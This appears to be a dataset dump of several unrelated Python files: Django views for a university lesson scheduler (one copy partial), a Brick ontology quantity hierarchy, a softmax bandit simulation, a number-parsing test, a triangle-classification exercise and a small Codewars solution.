q.end_time.isoformat(timespec='seconds'),
q.name,
group,
Room.objects.filter(id=q.room_id)[:1].get().number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in groups_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(groups_lessons_list),
'events': groups_lessons_list,
'type': 'group',
'name': group,
'lessons': Lesson.objects.all(),
'start_date': get_start_date(groups_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "groups_scheduler.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "groups_scheduler.html", context={'form': SelectGroupForm()})
def show_schedule(request: HttpRequest) -> HttpResponse:
"""Render the schedule page"""
context = generate_full_schedule_context()
return render(request, "full_schedule.html", context)
def edit(request: HttpRequest, lesson_id) -> HttpResponse:
"""Render the edit page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = EditForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form})
past_conflicts = list(Conflict.objects.all())
lesson = Lesson.objects.get(id=form.cleaned_data['id'])
lesson.name = form.cleaned_data['name']
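            # The professor field is expected as "<name> <surname>", so the
            # whitespace split below yields exactly two tokens.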
professor = form.cleaned_data['professor'].strip().split()
lesson.professor = get_professor(professor[0], professor[1])
lesson.room = get_room(form.cleaned_data['room'])
lesson.group = get_group(form.cleaned_data['group'])
lesson.start_time = form.cleaned_data['start_time']
lesson.end_time = form.cleaned_data['end_time']
lesson.save()
db_conflicts()
context = generate_full_index_context_with_date(form.cleaned_data['start_time'])
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return render(request, 'popup.html', context={"form": form})
    try:
        lesson = Lesson.objects.get(id=lesson_id)
    except Lesson.DoesNotExist:
        # Mirror remove(): a stale or unknown id just sends the user back.
        return redirect('/calendar/')
    form = EditForm(
        initial={'id': lesson.id, 'name': lesson.name, 'professor': lesson.professor,
                 'room': lesson.room, 'group': lesson.group,
                 'start_time': lesson.start_time, 'end_time': lesson.end_time})
    return render(request, 'popup.html', context={"form": form})
def create(request: HttpRequest) -> HttpResponse:
"""Render the create page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = EditForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form})
past_conflicts = list(Conflict.objects.all())
professor = form.cleaned_data['professor'].strip().split()
professor = get_professor(professor[0], professor[1])
room = get_room(form.cleaned_data['room'])
group = get_group(form.cleaned_data['group'])
Lesson.objects.get_or_create(
name=form.cleaned_data['name'],
professor=professor,
room=room,
group=group,
start_time=form.cleaned_data['start_time'],
end_time=form.cleaned_data['end_time']
)
db_conflicts()
context = generate_full_index_context_with_date(form.cleaned_data['start_time'])
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return render(request, 'popup.html', context={"form": form})
return render(request, 'popup.html', context={"form": EditForm()})
def remove(request: HttpRequest, lesson_id) -> HttpResponse:
"""Remove event and redirect to index page"""
try:
if request.method == 'POST':
past_conflicts = list(Conflict.objects.all())
lesson = Lesson.objects.get(id=lesson_id)
lesson.delete()
db_conflicts()
context = generate_full_index_context()
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return redirect('/calendar/')
except Lesson.DoesNotExist:
return redirect('/calendar/')
def is_ajax(request: HttpRequest) -> bool:
    """Return True when the request was made via XMLHttpRequest."""
    return request.META.get('HTTP_X_REQUESTED_WITH', '').lower() == 'xmlhttprequest'
def delete_lessons(request: HttpRequest) -> HttpResponse:
"""Logic for mass delete of conflicts"""
if request.method == 'POST':
past_conflicts = list(Conflict.objects.all())
checks = request.POST.getlist('checks[]')
Lesson.objects.filter(id__in=checks).delete()
db_conflicts()
context = generate_full_index_context()
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
context = generate_full_index_context()
return render(request, 'index.html', context=context)
def edit_lessons(request: HttpRequest) -> HttpResponse:
"""Logic for mass edit of conflicts"""
if request.method == 'POST':
form = MassEditForm(request.POST)
if form.is_valid():
changes = {}
past_conflicts = list(Conflict.objects.all())
if form.cleaned_data['lesson_name']:
changes['name'] = form.cleaned_data['lesson_name']
if form.cleaned_data['professor']:
professor = form.cleaned_data['professor'].strip().split()
changes['professor'] = get_professor(professor[0], professor[1])
if form.cleaned_data['room']:
changes['room'] = get_room(form.cleaned_data['room'])
if form.cleaned_data['group']:
changes['group'] = get_group(form.cleaned_data['group'])
if form.cleaned_data['start_time']:
changes['start_time'] = form.cleaned_data['start_time']
if form.cleaned_data['end_time']:
changes['end_time'] = form.cleaned_data['end_time']
checks = request.POST.getlist('checks[]')
if changes != {}:
lessons = Lesson.objects.filter(id__in=checks)
lessons.update(**changes)
db_conflicts()
context_after_edit = generate_full_index_context()
current_conflicts = list(context_after_edit['conflicts'])
context_after_edit.update(
generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context_after_edit)
context: dict = {}
context.update(generate_conflicts_context())
context.update(generate_full_schedule_context())
context.update({'form': form})
return render(request, 'index.html', context=context)
return index(request)
def professors(request: HttpRequest) -> HttpResponse:
"""Render the professors page"""
professors_list = Professor.objects.all()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
if request.method == 'POST':
if 'choose' in request.POST:
form = SelectProfessorForm(request.POST)
if form.is_valid():
professor = form.cleaned_data['professor']
email = professor.email
                if not email:
                    email = "No email"
context = {'professors': professors_list, 'form': form, 'email': email}
elif 'save' in request.POST:
form = SelectProfessorForm(request.POST)
if form.is_valid():
email = request.POST.get('email')
professor = form.cleaned_data['professor']
try:
professor_with_email = Professor.objects.get(email=email)
if professor != professor_with_email:
context = {'professors': professors_list, 'form': form, 'email': email,
'inform': "This email is already in use"}
else:
professor.email = email
professor.save()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
except Professor.DoesNotExist:
professor.email = email
professor.save()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
else:
return HttpResponse("AN ERROR OCCURRED")
return render(request, "professors.html", context)
def export(request: HttpRequest) -> HttpResponse:
"""Render the export page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = ExportForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form, "export": True})
if form.cleaned_data["start_time"] and form.cleaned_data["end_time"] and \
form.cleaned_data["file_format"] == "csv":
temp_file = export_to_csv(form.cleaned_data["start_time"],
form.cleaned_data["end_time"])
file_name = 'schedule.csv'
elif form.cleaned_data["start_time"] and form.cleaned_data["end_time"] and \
form.cleaned_data["file_format"] == "excel":
temp_file = export_to_excel(form.cleaned_data["start_time"],
form.cleaned_data["end_time"])
file_name = 'schedule.xlsx'
else:
return render(request, 'popup.html', context={"form": form, "export": True})
wrapper = FileWrapper(temp_file)
response = HttpResponse(wrapper, content_type='application/vnd.ms-excel')
response['Content-Disposition'] = 'attachment; filename=' + file_name
return response
return render(request, 'popup.html', context={"form": form, "export": True})
form = ExportForm()
return render(request, 'popup.html', context={"form": form, "export": True})
def view_students(request: HttpRequest) -> HttpResponse:
"""Render the group schedule page"""
if request.method == 'POST':
form = SelectGroupForm(request.POST)
if form.is_valid():
group = form.cleaned_data['group']
group_students_query = Student.objects.filter(group=group)
students = [(q.index, q.name, q.surname) for q in group_students_query]
context = {
'form': form,
'students': students,
'group': group.name
}
return render(request, "students.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "students.html", context={'form': SelectGroupForm()})
| """Views gathering point"""
import os.path
from datetime import datetime
from wsgiref.util import FileWrapper
import pandas as pd
from django.contrib.auth import authenticate, login as log
from django.core.files.storage import default_storage
from django.conf import settings
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect
from django.shortcuts import render, redirect
from django.template import loader
from django.utils.datastructures import MultiValueDictKeyError
from xlrd import XLRDError
import scheduler.import_handlers as imp
from scheduler.calendar_util import get_start_date, generate_conflicts_context, \
generate_full_schedule_context, generate_full_index_context_with_date, get_group_colors, \
get_rooms_colors, generate_full_index_context, generate_context_for_conflicts_report
from scheduler.conflicts_checker import db_conflicts, conflicts_diff
from scheduler.model_util import get_professor, get_room, get_group
from scheduler.models import Room, Lesson, Group, Conflict, Professor, Student
from scheduler.export_handlers import export_to_csv, export_to_excel
from .forms import SelectRoomForm, SelectProfessorForm, SelectGroupForm, \
EditForm, MassEditForm, LoginForm, ExportForm
def login(request: HttpRequest) -> HttpResponse:
"""Render the login page"""
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
username = form.cleaned_data['login']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
if user.is_superuser:
log(request, user)
# Redirect to a success page.
return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL)
context = {'error': "Incorrect login or password", 'form': form}
return render(request, 'login.html', context)
return render(request, 'login.html', context={"form": form})
context = {'form': LoginForm()}
return render(request, 'login.html', context)
def index(request: HttpRequest) -> HttpResponse:
"""Render the main page"""
context: dict = {}
context.update(generate_conflicts_context())
context.update(generate_full_schedule_context())
context['form'] = MassEditForm()
return render(request, 'index.html', context)
def index_specific(_request: HttpRequest, date: str) -> HttpResponse:
"""Render the main page with given date"""
date_as_datetime = datetime.strptime(date, '%Y-%m-%d')
context = generate_full_index_context_with_date(date_as_datetime)
form = MassEditForm()
context.update({'form': form})
return render(_request, 'index.html', context)
def upload_schedule(request: HttpRequest) -> HttpResponse:
"""Render schedule upload page"""
filename = None
context: dict = {}
try:
if request.method == 'POST' and request.FILES['uploaded_file']:
file = request.FILES['uploaded_file']
if isinstance(file.name, str):
filename = default_storage.save(file.name, file)
ext = os.path.splitext(file.name)[1]
if ext == '.csv':
data = pd.read_csv(file.name)
elif ext == '.xlsx':
data = pd.read_excel(file.name)
else:
return render(request, "upload_schedule.html",
{'error': "Error: Extension not supported"})
added_lessons, incorrect, duplicate = imp.parse_data(data, ext)
data_html = data.style \
.set_table_attributes('class="table table-striped table-hover table-bordered"')\
.apply(lambda x: [('background: lightcoral' if x.name in incorrect else
('background: lightblue' if x.name in duplicate else ''))
for _ in x], axis=1) \
.render()
db_conflicts()
context = {'loaded_data': data_html, 'added': added_lessons}
except MultiValueDictKeyError:
context = {'error': "Error: You didn't select a file"}
except XLRDError:
context = {'error': "Error: Corrupted file"}
except UnicodeDecodeError:
context = {'error': "Error: File contains weird symbols"}
except imp.ImportSizeException:
context = {'error': "Error: Incorrect number of columns"}
finally:
if filename:
default_storage.delete(filename)
return render(request, "upload_schedule.html", context)
def upload_students(request: HttpRequest) -> HttpResponse:
"""Render students upload page"""
filename = None
context: dict = {}
try:
if request.method == 'POST' and request.FILES['uploaded_file']:
file = request.FILES['uploaded_file']
if isinstance(file.name, str):
filename = default_storage.save(file.name, file)
ext = os.path.splitext(file.name)[1]
if ext == '.csv':
data = pd.read_csv(file.name)
elif ext == '.xlsx':
data = pd.read_excel(file.name)
else:
return render(request, "upload_students.html",
{'error': "Error: Extension not supported"})
added_lessons, incorrect, duplicate = imp.import_students(data)
data_html = data.style \
.set_table_attributes('class="table table-striped table-hover table-bordered"')\
.apply(lambda x: [('background: lightcoral' if x.name in incorrect else
('background: lightblue' if x.name in duplicate else ''))
for _ in x], axis=1) \
.render()
db_conflicts()
context = {'loaded_data': data_html, 'added': added_lessons}
except MultiValueDictKeyError:
context = {'error': "Error: You didn't select a file"}
except XLRDError:
context = {'error': "Error: Corrupted file"}
except UnicodeDecodeError:
context = {'error': "Error: File contains weird symbols"}
except imp.ImportSizeException:
context = {'error': "Error: Incorrect number of columns"}
finally:
if filename:
default_storage.delete(filename)
return render(request, "upload_students.html", context)
def show_conflicts(request: HttpRequest) -> HttpResponse:
"""Render the conflicts page"""
template = loader.get_template('conflicts.html')
context = generate_conflicts_context()
return HttpResponse(template.render(context, request))
def show_rooms_schedule(request: HttpRequest) -> HttpResponse:
"""Render the room schedule page"""
if request.method == 'POST':
form = SelectRoomForm(request.POST)
if form.is_valid():
room = form.cleaned_data['room']
room_number = room.number
room_lessons_query = Lesson.objects.filter(room=room)
room_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
q.end_time.isoformat(timespec='seconds'),
q.name,
Group.objects.filter(id=q.group_id)[:1].get().name,
room_number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in room_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(room_lessons_list),
'type': 'room',
'name': room_number,
'events': room_lessons_list,
'start_date': get_start_date(room_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "room_schedule.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "room_schedule.html", context={'form': SelectRoomForm()})
def show_professors_schedule(request: HttpRequest) -> HttpResponse:
"""Render the professor schedule page"""
if request.method == 'POST':
form = SelectProfessorForm(request.POST)
if form.is_valid():
professor = form.cleaned_data['professor']
professors_lessons_query = Lesson.objects.filter(professor=professor)
professors_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
q.end_time.isoformat(timespec='seconds'),
q.name,
Group.objects.filter(id=q.group_id)[:1].get().name,
Room.objects.filter(id=q.room_id)[:1]
.get().number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in professors_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(professors_lessons_list),
'events': professors_lessons_list,
'type': 'professor',
'name': professor,
'lessons': Lesson.objects.all(),
'start_date': get_start_date(professors_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "professors_scheduler.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "professors_scheduler.html", context={'form': SelectProfessorForm()})
def show_groups_schedule(request: HttpRequest) -> HttpResponse:
"""Render the group schedule page"""
if request.method == 'POST':
form = SelectGroupForm(request.POST)
if form.is_valid():
group = form.cleaned_data['group']
groups_lessons_query = Lesson.objects.filter(group=group)
groups_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
q.end_time.isoformat(timespec='seconds'),
q.name,
group,
Room.objects.filter(id=q.room_id)[:1].get().number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in groups_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(groups_lessons_list),
'events': groups_lessons_list,
'type': 'group',
'name': group,
'lessons': Lesson.objects.all(),
'start_date': get_start_date(groups_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "groups_scheduler.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "groups_scheduler.html", context={'form': SelectGroupForm()})
def show_schedule(request: HttpRequest) -> HttpResponse:
"""Render the schedule page"""
context = generate_full_schedule_context()
return render(request, "full_schedule.html", context)
def edit(request: HttpRequest, lesson_id) -> HttpResponse:
"""Render the edit page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = EditForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form})
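            # Snapshot the conflicts before saving, so the report can diff old vs. new.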
past_conflicts = list(Conflict.objects.all())
lesson = Lesson.objects.get(id=form.cleaned_data['id'])
lesson.name = form.cleaned_data['name']
professor = form.cleaned_data['professor'].strip().split()
lesson.professor = get_professor(professor[0], professor[1])
lesson.room = get_room(form.cleaned_data['room'])
lesson.group = get_group(form.cleaned_data['group'])
lesson.start_time = form.cleaned_data['start_time']
lesson.end_time = form.cleaned_data['end_time']
lesson.save()
db_conflicts()
context = generate_full_index_context_with_date(form.cleaned_data['start_time'])
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return render(request, 'popup.html', context={"form": form})
lesson = Lesson.objects.get(id=lesson_id)
form = EditForm(
initial={'id': lesson.id, 'name': lesson.name, 'professor': lesson.professor,
'room': lesson.room, 'group': lesson.group,
'start_time': lesson.start_time, 'end_time': lesson.end_time})
return render(request, 'popup.html', context={"form": form})
def create(request: HttpRequest) -> HttpResponse:
"""Render the create page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = EditForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form})
past_conflicts = list(Conflict.objects.all())
professor = form.cleaned_data['professor'].strip().split()
professor = get_professor(professor[0], professor[1])
room = get_room(form.cleaned_data['room'])
group = get_group(form.cleaned_data['group'])
Lesson.objects.get_or_create(
name=form.cleaned_data['name'],
professor=professor,
room=room,
group=group,
start_time=form.cleaned_data['start_time'],
end_time=form.cleaned_data['end_time']
)
db_conflicts()
context = generate_full_index_context_with_date(form.cleaned_data['start_time'])
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return render(request, 'popup.html', context={"form": form})
return render(request, 'popup.html', context={"form": EditForm()})
def remove(request: HttpRequest, lesson_id) -> HttpResponse:
"""Remove event and redirect to index page"""
try:
if request.method == 'POST':
past_conflicts = list(Conflict.objects.all())
lesson = Lesson.objects.get(id=lesson_id)
lesson.delete()
db_conflicts()
context = generate_full_index_context()
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
return redirect('/calendar/')
except Lesson.DoesNotExist:
return redirect('/calendar/')
def is_ajax(request: HttpRequest) -> bool:
return request.META.get('HTTP_X_REQUESTED_WITH', '').lower() == 'xmlhttprequest'
def delete_lessons(request: HttpRequest) -> HttpResponse:
"""Logic for mass delete of conflicts"""
if request.method == 'POST':
past_conflicts = list(Conflict.objects.all())
checks = request.POST.getlist('checks[]')
Lesson.objects.filter(id__in=checks).delete()
db_conflicts()
context = generate_full_index_context()
current_conflicts = list(context['conflicts'])
context.update(generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context)
context = generate_full_index_context()
return render(request, 'index.html', context=context)
def edit_lessons(request: HttpRequest) -> HttpResponse:
"""Logic for mass edit of conflicts"""
if request.method == 'POST':
form = MassEditForm(request.POST)
if form.is_valid():
changes = {}
past_conflicts = list(Conflict.objects.all())
if form.cleaned_data['lesson_name']:
changes['name'] = form.cleaned_data['lesson_name']
if form.cleaned_data['professor']:
professor = form.cleaned_data['professor'].strip().split()
changes['professor'] = get_professor(professor[0], professor[1])
if form.cleaned_data['room']:
changes['room'] = get_room(form.cleaned_data['room'])
if form.cleaned_data['group']:
changes['group'] = get_group(form.cleaned_data['group'])
if form.cleaned_data['start_time']:
changes['start_time'] = form.cleaned_data['start_time']
if form.cleaned_data['end_time']:
changes['end_time'] = form.cleaned_data['end_time']
checks = request.POST.getlist('checks[]')
if changes != {}:
lessons = Lesson.objects.filter(id__in=checks)
lessons.update(**changes)
db_conflicts()
context_after_edit = generate_full_index_context()
current_conflicts = list(context_after_edit['conflicts'])
context_after_edit.update(
generate_context_for_conflicts_report(past_conflicts, current_conflicts))
return render(request, 'index.html', context=context_after_edit)
context: dict = {}
context.update(generate_conflicts_context())
context.update(generate_full_schedule_context())
context.update({'form': form})
return render(request, 'index.html', context=context)
return index(request)
def professors(request: HttpRequest) -> HttpResponse:
"""Render the professors page"""
professors_list = Professor.objects.all()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
if request.method == 'POST':
if 'choose' in request.POST:
form = SelectProfessorForm(request.POST)
if form.is_valid():
professor = form.cleaned_data['professor']
email = professor.email
if not email:
email = "Noemail"
context = {'professors': professors_list, 'form': form, 'email': email}
elif 'save' in request.POST:
form = SelectProfessorForm(request.POST)
if form.is_valid():
email = request.POST.get('email')
professor = form.cleaned_data['professor']
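                # Keep e-mail addresses unique: refuse to save one already owned by another professor.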
try:
professor_with_email = Professor.objects.get(email=email)
if professor != professor_with_email:
context = {'professors': professors_list, 'form': form, 'email': email,
'inform': "This email is already in use"}
else:
professor.email = email
professor.save()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
except Professor.DoesNotExist:
professor.email = email
professor.save()
context = {'professors': professors_list, 'form': SelectProfessorForm()}
else:
return HttpResponse("AN ERROR OCCURRED")
return render(request, "professors.html", context)
def export(request: HttpRequest) -> HttpResponse:
"""Render the export page"""
if request.META.get('HTTP_REFERER') is None:
return redirect('/calendar/')
if request.method == 'POST':
form = ExportForm(request.POST)
if form.is_valid():
if is_ajax(request):
return render(request, 'popup.html', context={"form": form, "export": True})
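            # Build the schedule export in the requested format for the chosen date range.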
if form.cleaned_data["start_time"] and form.cleaned_data["end_time"] and \
form.cleaned_data["file_format"] == "csv":
temp_file = export_to_csv(form.cleaned_data["start_time"],
form.cleaned_data["end_time"])
file_name = 'schedule.csv'
elif form.cleaned_data["start_time"] and form.cleaned_data["end_time"] and \
form.cleaned_data["file_format"] == "excel":
temp_file = export_to_excel(form.cleaned_data["start_time"],
form.cleaned_data["end_time"])
file_name = 'schedule.xlsx'
else:
return render(request, 'popup.html', context={"form": form, "export": True})
wrapper = FileWrapper(temp_file)
response = HttpResponse(wrapper, content_type='application/vnd.ms-excel')
response['Content-Disposition'] = 'attachment; filename=' + file_name
return response
return render(request, 'popup.html', context={"form": form, "export": True})
form = ExportForm()
return render(request, 'popup.html', context={"form": form, "export": True})
def view_students(request: HttpRequest) -> HttpResponse:
"""Render the group schedule page"""
if request.method == 'POST':
form = SelectGroupForm(request.POST)
if form.is_valid():
group = form.cleaned_data['group']
group_students_query = Student.objects.filter(group=group)
students = [(q.index, q.name, q.surname) for q in group_students_query]
context = {
'form': form,
'students': students,
'group': group.name
}
return render(request, "students.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "students.html", context={'form': SelectGroupForm()}) | en | 0.693977 | Views gathering point Render the login page # Redirect to a success page. Render the main page Render the main page with given date Render schedule upload page Render students upload page Render the conflicts page Render the room schedule page Render the professor schedule page Render the group schedule page Render the schedule page Render the edit page Render the create page Remove event and redirect to index page Logic for mass delete of conflicts Logic for mass edit of conflicts Render the professors page Render the export page Render the group schedule page | 1.973503 | 2 |
quantities.py | shreyasnagare/brick-owl-dl | 0 | 6616838 |
from rdflib import Graph, Literal, BNode, Namespace, RDF, URIRef
from rdflib.collection import Collection
from rdflib.extras.infixowl import Restriction
from namespaces import *
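# Class hierarchy as a nested dict: each key is a class name, "subclasses" nests
# its children, and OWL predicates (e.g. OWL.equivalentClass) may appear as extra keys.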
quantity_definitions = {
"Quantity": {
"subclasses": {
"Air_Quality": {
"subclasses": {
"CO2_Level": {},
"PM10_Level": {},
"PM25_Level": {},
"TVOC_Level": {},
},
},
"Conductivity": {},
"Capacity": {},
"Enthalpy": {},
"Grains": {},
"Power": {
"subclasses": {
"Electric_Power": {
"subclasses": {
"Apparent_Power": {},
"Active_Power": {
OWL.equivalentClass: "Real_Power",
},
"Reactive_Power": {},
"Complex_Power": {},
},
},
"Thermal_Power": {}
},
},
"Cloudage": {},
"Current": {
"subclasses": {
"Electric_Current": {
"subclasses": {
"Current_Angle": {},
"Current_Magnitude": {},
"Current_Imbalance": {},
"Current_Total_Harmonic_Distortion": {},
"Alternating_Current_Frequency": {},
},
},
},
},
"Voltage": {
"subclasses": {
"Electric_Voltage": {
"subclasses": {
"Voltage_Magnitude": {},
"Voltage_Angle": {},
"Voltage_Imbalance": {},
},
},
},
},
"Daytime": {},
"Dewpoint": {},
"Direction": {
"subclasses": {
"Wind_Direction": {},
},
},
"Energy": {
"subclasses": {
"Electric_Energy": {},
"Thermal_Energy": {},
},
},
"Flow": {},
"Frequency": {
"subclasses": {
"Alternating_Current_Frequency": {},
},
},
"Humidity": {},
"Illuminance": {},
"Irradiance": {
"subclasses": {
"Solar_Irradiance": {},
},
},
"Level": {
"subclasses": {
"CO2_Level": {},
"PM10_Level": {},
"PM25_Level": {},
"TVOC_Level": {},
},
},
"Luminance": {
"subclasses": {
"Luminous_Flux": {},
"Luminous_Intensity": {},
},
},
"Power_Factor": {},
"Precipitation": {},
"Pressure": {
"subclasses": {
"Atmospheric_Pressure": {},
"Static_Pressure": {},
},
},
"Speed": {
"subclasses": {
"Wind_Speed": {},
},
},
"Temperature": {
"subclasses": {
"Operative_Temperature": {},
"Radiant_Temperature": {},
"Dry_Bulb_Temperature": {},
"Wet_Bulb_Temperature": {},
},
},
"Weather_Condition": {
},
},
},
}
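# Example (not part of the original module): a minimal sketch showing how a
# nested definition tree like the one above could be flattened into rdflib
# triples. The BRICK namespace URI below is an assumption for illustration.
from rdflib.namespace import OWL as _OWL, RDFS as _RDFS
def build_class_tree(graph, ns, name, body, parent=None):
    """Recursively emit owl:Class / rdfs:subClassOf triples for one subtree."""
    node = ns[name]
    graph.add((node, RDF.type, _OWL.Class))
    if parent is not None:
        graph.add((node, _RDFS.subClassOf, parent))
    for key, value in body.items():
        if key == "subclasses":
            for child_name, child_body in value.items():
                build_class_tree(graph, ns, child_name, child_body, node)
        elif key == _OWL.equivalentClass:
            graph.add((node, _OWL.equivalentClass, ns[value]))
# Usage sketch:
# g = Graph()
# BRICK = Namespace("https://brickschema.org/schema/Brick#")  # assumed URI
# build_class_tree(g, BRICK, "Quantity", quantity_definitions["Quantity"])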
softmax.py | gavinsyw/BanditAlgorithm | 2 | 6616839 | import numpy as np
from matplotlib import pyplot
from env import StochasticMAB
import math
# Supported random type: Gaussian, Uniform, Bernoulli, Exponential
def softmax(total_time_slot, arm_num, tau):
bandit_model = StochasticMAB(n_arms=arm_num, random_type="Gaussian")
ave_reward = list() # average reward for each arm
roll_time = list() # roll time for each arm
total_reward = [0] # current total reward, recorded at each time slot
# roll each arm once first
for i in range(arm_num):
this_reward = bandit_model.roll(i)
ave_reward.append(this_reward)
roll_time.append(1)
total_reward.append(total_reward[-1] + this_reward)
for i in range(total_time_slot - arm_num):
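        # Boltzmann exploration: accumulate exp(Q_j / tau) to form a cumulative distribution.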
        p_arm_list = [math.exp(ave_reward[0] / tau)]  # the first arm must be scaled by tau too
for j in range(1, arm_num):
p_arm = math.exp(ave_reward[j]/tau)+p_arm_list[-1]
p_arm_list.append(p_arm)
        p_arm_list = [p / p_arm_list[-1] for p in p_arm_list]  # normalize the cumulative sums
        # Inverse-CDF sampling: pick the first bucket whose cumulative mass exceeds r.
        arm = arm_num - 1  # default to the last arm if r falls in the final bucket
        r = np.random.random_sample()
        for j in range(arm_num - 1):
            if r < p_arm_list[j]:
                arm = j
                break
this_reward = bandit_model.roll(arm)
ave_reward[arm] = (ave_reward[arm] * roll_time[arm] + this_reward) / (roll_time[arm] + 1)
roll_time[arm] += 1
total_reward.append(total_reward[-1] + this_reward)
max_reward = bandit_model.max_expectation()
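    # Regret at step i: the best achievable expected reward i*max minus what was actually earned.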
regret = [i*max_reward-total_reward[i] for i in range(total_time_slot+1)]
return ave_reward, roll_time, total_reward, regret
if __name__ == '__main__':
a_reward, r_time, sum_reward, cumulative_regret = softmax(total_time_slot=10000, arm_num=10, tau=0.7)
t = [100*i for i in range(1, 100)]
reward_t = [sum_reward[100*i] for i in range(1, 100)]
regret_t = [cumulative_regret[100*i] for i in range(1, 100)]
pyplot.plot(t, reward_t)
pyplot.plot(t, regret_t)
    pyplot.show()
tests/test_number_parsing.py | noviluni/number-parser | 0 | 6616840 |
import pytest
from number_parser import parse
LANG = 'en'
class TestNumberParser():
@pytest.mark.parametrize(
"test_input,expected",
[
("OnE DaY at a Time.", "1 DaY at a Time."),
("SeVentY THREE days of SUMMER!!!.", "73 days of SUMMER!!!."),
("Twelve 11 pm", "12 11 pm"),
]
)
def test_parse_case_of_string(self, expected, test_input):
        assert parse(test_input, LANG) == expected
Curso_Em_Video_Python/ex042.py | ThallesTorres/Curso_Em_Video_Python | 0 | 6616841 | # Ex: 042 - Redo CHALLENGE 035 on triangles, adding a feature that
# shows which type of triangle will be formed: Equilateral - all sides
# equal, Isosceles - two sides equal, Scalene - all sides different.
print('''
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--Welcome!
--Exercise 042
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
''')
print('--Fill in the data ')
m1 = float(input('1st side of the triangle: '))
m2 = float(input('2nd side of the triangle: '))
m3 = float(input('3rd side of the triangle: '))
print('')
# Check the triangle inequality first; classifying an impossible triangle makes no sense.
if (m1 + m2) <= m3 or (m1 + m3) <= m2 or (m2 + m3) <= m1:
    print('Based on the given measurements, it is impossible to form a triangle.')
elif m1 == m2 == m3:
    n = 'EQUILATERAL'
    print(f'Based on the given measurements, your triangle is {n}')
elif m1 == m2 or m1 == m3 or m2 == m3:
    n = 'ISOSCELES'
    print(f'Based on the given measurements, your triangle is {n}')
else:
    n = 'SCALENE'
    print(f'Based on the given measurements, your triangle is {n}')
print('''
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--Thanks for using this program!
--Developed by <NAME>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-''')
Python/8/NthPower/nth_power.py | hwakabh/codewars | 0 | 6616842 |
import sys
def index(array, n):
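    """Return array[n] ** n, or -1 when n is past the end of the array."""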
if len(array) - 1 < n:
return -1
else:
return array[n] ** n
